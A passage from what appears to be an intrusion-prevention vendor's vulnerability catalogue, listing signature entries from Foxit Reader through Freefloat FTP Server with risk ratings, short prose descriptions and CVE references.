Software: Foxit Reader
Type: Malfunction
Description: There exists a use-after-free vulnerability in Foxit PDF Reader. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Foxit-PDF-JavaScript-Xfa-User-After-Free
References:
CVE-2018-3850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3850
Back to top

Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software PhantomPDF
Risk: High
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader; PhantomPDF
Type: Malfunction
Description: An use-after-free vulnerability has been reported in Foxit PhantomPDF. This vulnerability is due to improper handling of AcroForm addWatermarkFromText objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.
Situation: File-PDF_Foxit-Phantompdf-Acroform-Addwatermarkfromtext-Object-Use-After-Free
References:
CVE-2020-8845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8845
Back to top

Foxit-Phantompdf-Text-Field-Object-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software PhantomPDF
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader; PhantomPDF
Type: Malfunction
Description: There exists a use-after-free vulnerability in Foxit PhantomPDF. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Foxit-Phantompdf-Text-Field-Object-Use-After-Free
References:
CVE-2020-8846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8846
Back to top

Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service

About this vulnerability: A vulnerability in Foxit Software Quick PDF Library
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Software Quick PDF Library
Type: Input Validation
Description: A denial of service vulnerability exists in Foxit Quick PDF Library. The vulnerability is due to improper input validation on page tree structures in a PDF file. A remote attacker may exploit this vulnerability by uploading a maliciously crafted PDF file to a vulnerable web application. Successful exploitation could result in denial-of-service conditions.
Situation: File-PDF_Foxit-Quick-PDF-Library-CVE-2018-20247-Denial-Of-Service
References:
CVE-2018-20247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20247
Back to top

Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software PDF Editor
Risk: High
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: A use-after-free vulnerability has been reported in Foxit Reader and Editor. This vulnerability is due to improper handling of Annotation objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.
Situation: File-PDF_Foxit-Reader-And-Editor-Annotation-CVE-2021-34833-Use-After-Free
References:
CVE-2021-34833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34833
Back to top

Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1069-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: Improper handling of associated file annotation objects in a PDF file causes a type confusion vulnerability in Foxit Reader. A successful exploit using a crafted file allows an attacker to execute arbitrary code on the target system.
Situation: File-PDF_Foxit-Reader-And-Phantompdf-Associated-File-Type-Confusion
References:
CVE-2018-3843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3843
Back to top

Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: High
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Platform: Generic
Software: Foxit Reader; PhantomPDF
Type: Malfunction
Description: An use-after-free vulnerability has been reported in Foxit Reader and Foxit PhantomPDF. This vulnerability is due to improper handling of Choice field objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.
Situation: File-PDF_Foxit-Reader-And-Phantompdf-Choice-Field-Use-After-Free
References:
CVE-2020-13557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557
Back to top

Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Generic
Software: Foxit Reader
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Foxit Reader and PhantomPDF. Successful exploitation could lead in arbitrary code execution.
Situation: File-Binary_Foxit-Reader-And-Phantompdf-Converttopdf-CVE-2020-8844-Integer-Overflow
References:
CVE-2020-8844
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8844
Back to top

Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Input Validation
Description: Improper handling of the xdpContent property of a submit object causes an information disclosure vulnerability in Foxit Readed. A successful exploit allows an attacker to gain access to potentially sensitive information.
Situation: File-PDF_Foxit-Reader-And-Phantompdf-Xfa-Xdpcontent-Information-Disclosure
References:
CVE-2018-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3956
Back to top

Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Input Validation
Description: Improper handling of the input to the gotoURL function call causes a command injection vulnerability in Foxit Reader. A successful exploit allows an attacker to execute arbitrary commands on the target system with the privileges of the affected process.
Situation: File-PDF_Foxit-Reader-And-Phantonpdf-Xfa-Gotourl-Command-Injection
References:
CVE-2017-10953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10953
Back to top

Foxit-Reader-Annotation-Delay-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: Improper handling of freed objects causes a use-after-free vulnerability in Foxit Reader. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-PDF_Foxit-Reader-Annotation-Delay-Use-After-Free
References:
CVE-2018-17682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17682
Back to top

Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: Improper handling of an annotation object causes a use after free vulnerability in Foxit Reader. A successful exploit may allow an attacker to run arbitrary code on the target system.
Situation: File-PDF_Foxit-Reader-Annotations-Bordereffectintensity-Use-After-Free
References:
CVE-2018-14300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14300
Back to top

Foxit-Reader-Annotations-NoteIcon-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There has been reported a use-after-free vulnerability in Foxit Reader. A remote attacker could exploit this vulnerability by having the target user open a maliciously crafted PDF document. Successful exploitation could lead to arbitrary code execution.
Situation: File-PDF_Foxit-Reader-Annotations-NoteIcon-Use-After-Free
References:
CVE-2018-14304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14304
Back to top

Foxit-Reader-Annotations-Point-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There has been reported a use after free vulnerability in Foxit Reader. A remote attacker could exploit this vulnerability by having the target user open maliciously crafted PDF document. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Foxit-Reader-Annotations-Point-Use-After-Free
References:
CVE-2018-9958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9958
Back to top

Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Buffer Overflow
Description: There has been reported a heap-based buffer overflow vulnerability in Foxit Reader. This vulnerability could be exploited by having a target user open a maliciously crafted BMP file.
Situation: File-Binary_Foxit-Reader-BMP-Biwidth-Heap-Based-Buffer-Overflow
References:
CVE-2017-17557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17557
Back to top

Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: Improper parsing of BMP files causes an out of bounds read vulnerability in Foxit Reader. A successful exploit may allow an attacker to gain information the helps further exploits of the system.
Situation: File-Binary_Foxit-Reader-Converttopdf-BMP-Out-Of-Bounds-Read
References:
CVE-2018-17686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17686
Back to top

Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Input Validation
Description: Improper handling of the GoToR action in a PDF file causes a stack buffer overflow in Foxit Reader. A successful exploitation of the vulnerability allows an attacker to run arbitrary code on the target unauthenticated.
Situation: File-PDF_Foxit-Reader-Gotor-Action-Stack-Buffer-Overflow
Back to top

Foxit-Reader-Insecure-Library-Loading

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Foxit Reader
Type: Malfunction
Description: A code execution vulnerability has been identified in Foxit Reader. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to open a file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CRL-Foxit-Reader-Insecure-Library-Loading
SMB-TCP_CHS_Foxit-Reader-Insecure-Library-Loading
References:
OSVDB-85774
http://www.osvdb.org/85774
Back to top

Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There has been reported a use-after-free vulnerability in Foxit Reader. A remote attacker could exploit this vulnerability by having the target user open a maliciously crafted PDF document. Successful exploitation could lead to arbitrary code execution.
Situation: File-PDF_Foxit-Reader-JavaScript-CreateTemplate-Use-After-Free
References:
CVE-2018-3939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3939
Back to top

Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free

About this vulnerability: A vulnerability in Foxit Reader
Risk: High
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader; PhantomPDF
Type: Use-after-free
Description: A vulnerability in Foxit Reader, Foxit Reader 9.2.0.9297 and earlier, and PhantomPDF 8.3.7.38093 and earlier, which allows remote attackers to execute arbitrary code due to the improper handling of freed objects in the JavaScript getPageNumWords method.
Situation: File-PDF_Foxit-Reader-JavaScript-getPageNumWords-Use-After-Free
References:
CVE-2018-3964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3964
Back to top

Foxit-Reader-JavaScript-MailForm-Use-After-Free

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: There has been reported a use-after-free vulnerability in Foxit Reader. A remote attacker could exploit this vulnerability by having the target user open a maliciously crafted PDF document. Successful exploitation could lead to arbitrary code execution.
Situation: File-PDF_Foxit-Reader-JavaScript-MailForm-Use-After-Free
References:
CVE-2018-3924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3924
Back to top

Foxit-Reader-JavaScript-popUpMenu-Use-After-Free

About this vulnerability: A vulnerability in Foxit Reader
Risk: High
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader;PhantomPDF
Type: Use-after-free
Description: A vulnerability in Foxit Reader, versions 9.3.0.10826 and earlier and 8.3.8.39677 and earlier, which allows remote attackers to execute arbitrary code by sending a crafted PDF file, due to the improper handling of freed objects in the JavaScript popUpMenu method.
Situation: File-PDF_Foxit-Reader-JavaScript-popUpMenu-Use-After-Free
References:
CVE-2019-6730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6730
Back to top

Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow

About this vulnerability: A vulnerability in Foxit Reader and PhantomPDF
Risk: High
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader; PhantomPDF
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in the PDF parsing component of Foxit Reader and PhantomPDF. This vulnerability is due to insufficient input validation when parsing shading patterns in a PDF. A remote attacker could exploit this vulnerability by enticing a user to open a crafted PDF file. Successful exploitation of the vulnerability could result in the execution of arbitrary code in the security context of the target user.
Situation: File-PDF_Foxit-Reader-PDF-Parsing-Shading-Pattern-Integer-Overflow
References:
CVE-2018-14295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14295
Back to top

Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: Moderate
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Malfunction
Description: An insecure library loading vulnerability exists in Foxit Reader. The vulnerability is due to the way that the affected component handles the loading of dynamic link library (.DLL) files. A remote attacker could exploit this vulnerability by enticing a target user to open a supported document file from an SMB or WebDAV share. Successful exploitation could result in arbitrary code execution in the security context of the target user.
Situation: HTTP_CSU-Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
SMB-TCP_CHS_Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
References:
CVE-2016-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0041
Back to top

Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Foxit Software Foxit Reader
Risk: High
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Reader
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been identified in Foxit Reader Plugin for Firefox. The vulnerability is due to a lack of bounds checking in npFoxitReaderPlugin.dll and affects handling of URLs. A remote attacker could exploit this vulnerability by enticing a target user to load a malicious PDF file. Successful exploitation would result in execution of arbitrary attacker code in the security context of the target user.
Situation: HTTP_CSU-Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow
References:
OSVDB-89030
http://www.osvdb.org/89030
Back to top

Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Foxit Software Foxit Studio Photo
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Studio Photo
Type: Malfunction
Description: There has been reported an out of bounds read vulnerability in Foxit Studio Photo. Successful exploitation could lead in disclosure of sensitive information.
Situation: File-Binary_Foxit-Studio-Photo-Psd-File-Imageresourceblocks-Out-Of-Bounds-Read
References:
CVE-2020-8879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8879
Back to top

Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Foxit Software Foxit Studio Photo
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Studio Photo
Type: Malfunction
Description: Improper handling of Psd files causes an out of bounds read vulnerability in Foxit Studio. A successful exploit may allow an attacker to gian access to data on the target system.
Situation: File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Read
References:
CVE-2020-8877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8877
Back to top

Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Foxit Software Foxit Studio Photo
Risk: Moderate
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Foxit Studio Photo
Type: Malfunction
Description: Improper validation of Psd file structures causes an out of bounds write vulnerability in Foxit Studio Photo. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Foxit-Studio-Photo-Psd-File-Processing-Out-Of-Bounds-Write
References:
CVE-2020-8878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8878
Back to top

Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow

About this vulnerability: A vulnerability in Foxit Studio Photo
Risk: High
First detected in: sgpkg-ips-1286-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Foxit Studio Photo
Type: Integer Overflow
Description: There exists a vulnerability in Foxit Studio Photo, versions 3.6.6.918 and earlier, which allows remote attackers to perform an out-of-bounds read and disclose information by enticing a victim to visit a malicious web page or open a crafted document.
Situation: File-Binary_Foxit-Studio-Photo-TIFF-File-Processing-Integer-Overflow
References:
CVE-2020-8880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8880
Back to top

Foxmail-Server-User-Command-BOF

About this vulnerability: Buffer overflow in Foxmail Server
Risk: High
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Foxmail Server
Type: Buffer Overflow
Description: Foxmail mail server contains a buffer overflow. A remote attacker could create a long USER command and overflow a buffer to execute arbitrary code on the server.
Situation: POP3_User-Command-Buffer-Overflow
References:
CVE-2005-0635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0635
BID-12711
http://www.securityfocus.com/bid/12711
OSVDB-14370
http://www.osvdb.org/14370
Back to top

Free-Download-Manager-Remote-Control-Authorization-Header-Buffer-Overflow

About this vulnerability: A vulnerability in Free Download Manager Remote Control Server
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1583-5242
Platform: Windows
Software: Free Download Manager
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the Remote Control Server component of Free Download Manager. The vulnerability is due to a boundary error while processing specially crafted HTTP requests containing a malformed Authorization header. Remote attackers may exploit this vulnerability to execute arbitrary code on the target server in the context of the server process.
Situation: HTTP_CSH-Excessively-Long-Basic-Authorization-Header
References:
CVE-2009-0183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0183
BID-33554
http://www.securityfocus.com/bid/33554
OSVDB-51745
http://www.osvdb.org/51745
Back to top

Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in Free Download Manager.ORG Free Download Manager (FDM)
Risk: Moderate
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Free Download Manager
Type: Buffer Overflow
Description: There exist multiple buffer overflow vulnerabilities in Free Download Manager. The vulnerabilities are due to boundary errors while parsing various fields within a crafted Torrent file. Remote attackers can exploit this vulnerability by enticing a user to open a crafted Torrent file, thereby creating a denial of service condition or potentially injecting and executing arbitrary code. In an attack scenario where arbitrary code is injected and executed on the target machine, the behaviour of the target host is dependent on the intention of the malicious code. Any code injected into the vulnerable program would execute in the security context of the currently logged in user. In case if code execution is not successful, the application will terminate abnormally.
Situation: HTTP_SS-Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
File-TextId_Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
References:
CVE-2009-0184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0184
BID-33555
http://www.securityfocus.com/bid/33555
Back to top

Free-Online-PHP-Obfuscator-Code

About this vulnerability: Executable code obfuscated with Free Online PHP Obfuscator
Risk: Moderate
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Post Compromise Behaviour
Description: Seeing obfuscated code may sometimes indicate malicious code trying to evade network inspection.
Situation: File-Text_Free-Online-PHP-Obfuscator-Code
File-Text_Globals-PHP-Obfuscator-Code
Back to top

FreeBSD-Bootpd-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in FreeBSD Project bootpd
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Buffer Overflow
Description: There has been reported a stack buffer overflow in the bootpd utility. This vulnerability can be exploited by sending crafted bootp packets to the target server. Successful exploitation may lead in arbitrary code execution or denial of service conditions.
Situation: BOOTP_CS-FreeBSD-Bootpd-Stack-Buffer-Overflow
References:
CVE-2018-17161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161
Back to top

FreeBSD-Bspatch-Utility-Remote-Code-Execution

About this vulnerability: A vulnerability in FreeBSD Project FreeBSD
Risk: Moderate
First detected in: sgpkg-ips-783-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Malfunction
Description: Improper validation of data legth information in patch files in the bspatch utility results in a vulnerability which can be exploited to gain the ability to execute code on the target machine.
Situation: File-Binary_FreeBSD-Bspatch-Utility-Remote-Code-Execution
References:
CVE-2014-9862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9862
Back to top

FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service

About this vulnerability: A vulnerability in FreeBSD Project FreeBSD
Risk: Moderate
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Integer Overflow
Description: Improper handling of various NFS requests within the nfsm_advance function causes a vulnerability in FreeBSD. A successful exploit allows an attacker to deny service by means of panicking the kernel.
Situation: Generic_CS-FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service
References:
CVE-2018-17158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158
Back to top

FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service

About this vulnerability: A vulnerability in FreeBSD Project FreeBSD
Risk: Moderate
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Resource Starvation
Description: Improper handling of various NFS requests within the nfsrvd_readdirplus function causes a denial of service vulnerability in FreeBSD.
Situation: Generic_CS-FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service
References:
CVE-2018-17159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159
Back to top

FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in FreeBSD NFS Server
Risk: High
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: FreeBSD NFS Server
Type: Malfunction
Description: A vulnerability in the FreeBSD NFS Server, versions 11.0-Stable prior to r340854 and 11.2-Releng prior to r341088, which allows remote attackers to cause a denial of service condition or execute arbitrary code by sending a crafted NFSv4 packet.
Situation: Generic_CS-FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write
References:
CVE-2018-17157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157
Back to top

FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption

About this vulnerability: A vulnerability in FreeBSD Nfs server
Risk: High
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Input Validation
Description: A memory corruption vulnerability has been reported in nfsrvd_readdir() function in FreeBSD NFS server. The vulnerability is due to insufficient sanitation of READDIR requests and can result in the underlying filesystem to interpret a file as a directory. A remote attacker can exploit this vulnerability using a specially crafted READDIR request. A successful exploitation can result in arbitrary code execution in the security context of the kernel. If the attack is unsuccessful, a denial of service condition may result.
Situation: Generic_CS-FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption
Generic_UDP-BSD-Nfs-Server-Readdir-Request-Memory-Corruption
References:
CVE-2013-3266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3266
OSVDB-92886
http://www.osvdb.org/92886
Back to top

FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in the FreeBSD NFS daemon
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Malfunction
Description: FreeBSD NFS daemon has a denial of service vulnerability. A successful exploit leads to an automatic reboot of the vulnerable target host as a result of a kernel panic.
Situation: Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service-2
Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service
References:
CVE-2006-0900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0900
BID-16838
http://www.securityfocus.com/bid/16838
OSVDB-23511
http://www.osvdb.org/23511
Back to top

FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure

About this vulnerability: A vulnerability in FreeBSD Project Routed
Risk: High
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in FreeBSD's Routed daemon, which implements the Routing Information Protocol (RIP). This daemon terminates due to an assertion failure upon receiving a specially crafted RIP request. A remote attacker can exploit this vulnerability by sending a crafted RIP request. Successful exploitation can cause a denial-of-service condition.
Situation: Generic_UDP-FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure
References:
CVE-2015-5674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5674
Back to top

FreeBSD-Rtsold-Dname_labeldec-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in FreeBSD Project FreeBSD
Risk: Moderate
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Input Validation
Description: A buffer overflow vulnerability has been reported in FreeBSD rtsold. The vulnerability is due to improper bounds checking during a copy operation when decoding domain name label encodings in router solicitation messages. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted router advertisement message to a host. Successful exploitation could lead to arbitrary code execution under the security context of the rtsold process.
Situation: IPv6_FreeBSD-Rtsold-Dname_labeldec-Stack-Buffer-Overflow
References:
CVE-2014-3954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3954
OSVDB-113610
http://www.osvdb.org/113610
Back to top

FreeBSD-SCTP-ICMPv6-Denial-Of-Service

About this vulnerability: A vulnerability in FreeBSD Project FreeBSD
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Malfunction
Description: There exists a denial-of-service vulnerability in FreeBSD kernel SCTP ICMPv6 stack.
Situation: IPv6_FreeBSD-SCTP-ICMPv6-Denial-Of-Service
References:
CVE-2016-1879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1879
Back to top

FreeBSD-TCP-Reassembly-Denial-Of-Service

About this vulnerability: A vulnerability in FreeBSD
Risk: High
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability has been reported in the FreeBSD kernel. The vulnerability is due to an error in TCP reassembly code when processing certain crafted sequence of TCP segments. Under certain circumstances, when TCP segments completely fill up an internal reassembly queue, FreeBSD adds a reassembly queue entry from the stack to the list. When the function returns, this stack entry can contain undefined data, leading to memory corruption. A remote unauthenticated attacker can exploit this vulnerability by sending crafted TCP segments to a vulnerable server. A successful exploitation will cause the kernel to crash resulting in a denial of service condition.
Situation: TCP_Segment-Invalid
References:
CVE-2014-3000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3000
BID-67153
http://www.securityfocus.com/bid/67153
OSVDB-106442
http://www.osvdb.org/106442
Back to top

Freefloat-FTP-Server-Invalid-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Freefloat FTP Server
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Freefloat FTP Server
